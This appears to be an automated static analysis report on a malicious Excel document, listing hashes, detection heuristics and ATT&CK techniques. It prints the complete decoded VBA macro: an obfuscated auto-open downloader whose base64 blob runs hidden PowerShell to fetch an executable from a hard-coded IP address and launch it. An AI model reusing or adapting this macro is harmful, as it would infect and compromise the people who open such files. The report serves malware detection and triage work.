Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbd635a64412b817…

MALICIOUS

Office (OLE)

78.5 KB Created: 2018-05-22 00:15:57 Authoring application: Microsoft Excel First seen: 2019-01-12
MD5: 0c228e6e5fb4c0ef09a00e5569ce738e SHA-1: 19f73bc3810fc982e65f64268ffa1df82c8fe47c SHA-256: bbd635a64412b817620c8105e6c91163275d7d04a9168008e21df3c49a3a7315
286 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an Office document containing obfuscated VBA macros. Critical heuristics indicate the use of WScript.Shell and a Shell() call, suggesting the macros are designed to execute arbitrary commands. The AutoOpen and Workbook_Open macros are triggered upon opening, and the presence of 'macros.bas' further points to macro-based execution. The primary function of the script appears to be downloading and executing a second-stage payload.

Heuristics 10

  • ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Function WZcP5agXEoKYGLCIT2(xnOjQadWmHxZiFF As String)
    Dim YfXbTq6ddHpcPoUM: Set YfXbTq6ddHpcPoUM = EIwcs3JoVhcqATY("WScript.Shell")
    YfXbTq6ddHpcPoUM.Run xnOjQadWmHxZiFF, 0, True
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function EIwcs3JoVhcqATY(xdS2l2yFcPofeqO As String) As Object
    Set EIwcs3JoVhcqATY = CreateObject(xdS2l2yFcPofeqO)
    End Function
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub Workbook_Open()
    AutoOpen
    End Sub
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Function
    Sub Workbook_Open()
    AutoOpen
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    End Sub
    Sub Auto_Open()
    Workbook_Open
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5898 bytes
SHA-256: bdd6b28e9f2002d44e9024cf496a8bc8f3fb6335f7ddde2546d4ae4c1e6d38bf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "mg2SUS"
Public Function CT8VcsoyuvYfbbD(pYg0g5iqgabltM As String, Optional THREE As Boolean = True) As String
Static vft5EmjG78VbQtoxZJ(0 To 255) As Byte
Dim kMpNR6fXY1ZVtKjQ() As Byte, ygtgtckUb90cXN() As Byte
Dim DX1p1USxVvPeEyt As Long, vtMdZP9a3enb4BH As Long
If vft5EmjG78VbQtoxZJ(0) = 0 Then
For DX1p1USxVvPeEyt = 0 To 255
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt) = 255
Next DX1p1USxVvPeEyt
For DX1p1USxVvPeEyt = 0 To 25
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt + 65) = DX1p1USxVvPeEyt
Next DX1p1USxVvPeEyt
For DX1p1USxVvPeEyt = 26 To 51
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt + 71) = DX1p1USxVvPeEyt
Next DX1p1USxVvPeEyt
For DX1p1USxVvPeEyt = 52 To 61
vft5EmjG78VbQtoxZJ(DX1p1USxVvPeEyt - 4) = DX1p1USxVvPeEyt
Next DX1p1USxVvPeEyt
vft5EmjG78VbQtoxZJ(43) = 62
vft5EmjG78VbQtoxZJ(47) = 63
End If
If pYg0g5iqgabltM = "" Then Exit Function
pYg0g5iqgabltM = Trim(pYg0g5iqgabltM)
If THREE Then
For DX1p1USxVvPeEyt = 0 To 255
If Not (Chr(DX1p1USxVvPeEyt) Like "[A-Za-z0-9+/=]") Then
pYg0g5iqgabltM = Replace(pYg0g5iqgabltM, Chr(DX1p1USxVvPeEyt), "")
End If
Next DX1p1USxVvPeEyt
End If
ygtgtckUb90cXN() = StrConv(pYg0g5iqgabltM, vbFromUnicode)
ReDim kMpNR6fXY1ZVtKjQ(0 To ((Len(pYg0g5iqgabltM) \ 4) * 3 - 1))
For DX1p1USxVvPeEyt = 0 To Len(pYg0g5iqgabltM) \ 4 - 2
vtMdZP9a3enb4BH = vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 3))
vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 2)) * &H40&)
vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 1)) * &H1000&)
vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 0)) * &H40000)
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 0) = (vtMdZP9a3enb4BH And &HFF0000) \ &H10000
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 1) = (vtMdZP9a3enb4BH And &HFF00&) \ &H100&
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 2) = vtMdZP9a3enb4BH And &HFF&
Next DX1p1USxVvPeEyt
vtMdZP9a3enb4BH = 0
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 3)) <> 255 Then vtMdZP9a3enb4BH = vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 3))
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 2)) <> 255 Then vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 2)) * &H40&)
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 1)) <> 255 Then vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 1)) * &H1000&)
If vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 0)) <> 255 Then vtMdZP9a3enb4BH = vtMdZP9a3enb4BH Or (vft5EmjG78VbQtoxZJ(ygtgtckUb90cXN(DX1p1USxVvPeEyt * 4 + 0)) * &H40000)
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 0) = (vtMdZP9a3enb4BH And &HFF0000) \ &H10000
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 1) = (vtMdZP9a3enb4BH And &HFF00&) \ &H100&
kMpNR6fXY1ZVtKjQ(DX1p1USxVvPeEyt * 3 + 2) = vtMdZP9a3enb4BH And &HFF&
If ygtgtckUb90cXN(UBound(ygtgtckUb90cXN) - 1) = 61 Then
CT8VcsoyuvYfbbD = Left(StrConv(kMpNR6fXY1ZVtKjQ, vbUnicode), UBound(kMpNR6fXY1ZVtKjQ) - 1)
ElseIf ygtgtckUb90cXN(UBound(ygtgtckUb90cXN)) = 61 Then
CT8VcsoyuvYfbbD = Left(StrConv(kMpNR6fXY1ZVtKjQ, vbUnicode), UBound(kMpNR6fXY1ZVtKjQ) - 0)
Else
CT8VcsoyuvYfbbD = StrConv(kMpNR6fXY1ZVtKjQ, vbUnicode)
End If
End Function
Sub Workbook_Open()
AutoOpen
End Sub
Sub Auto_Open()
Workbook_Open
End Sub

Public Function EIwcs3JoVhcqATY(xdS2l2yFcPofeqO As String) As Object
Set EIwcs3JoVhcqATY = CreateObject(xdS2l2yFcPofeqO)
End Function
Sub AutoOpen()
Dim NNTvluuKPGQjEc As String
NNTvluuKPGQjEc = "JzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtbm9sb2dvIC1ub3Byb2ZpbGUgLWMgSUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vNDEuNTkuMC4xMDAvaW50cmFuZXQvanMvdGhyb3cuZXhlJywgJ0M6XFVzZXJzXFB1YmxpY1xleGNlbC5leGUnKTsgU3RhcnQtUHJvY2VzcyBDOlxVc2Vyc1xQdWJsaWNcZXhjZWwuZXhl"
Dim qX9jovfv26b4yQrIazTZI As String
qX9jovfv26b4yQrIazTZI = FLtO9I.PXiEKxG
Dim EIGHTTEEN As String
EIGHTTEEN = CT8VcsoyuvYfbbD(qX9jovfv26b4yQrIazTZI & NNTvluuKPGQjEc)
FLtO9I.WZcP5agXEoKYGLCIT2 (EIGHTTEEN)
End Sub

Attribute VB_Name = "FLtO9I"
Attribute VB_Base = "0{DA6C8FFA-D929-40C8-902A-F3B0B140064E}{14C77E71-7F94-413F-B533-ED4D6B52A83A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
              
Function WZcP5agXEoKYGLCIT2(xnOjQadWmHxZiFF As String)
Dim YfXbTq6ddHpcPoUM: Set YfXbTq6ddHpcPoUM = EIwcs3JoVhcqATY("WScript.Shell")
YfXbTq6ddHpcPoUM.Run xnOjQadWmHxZiFF, 0, True
End Function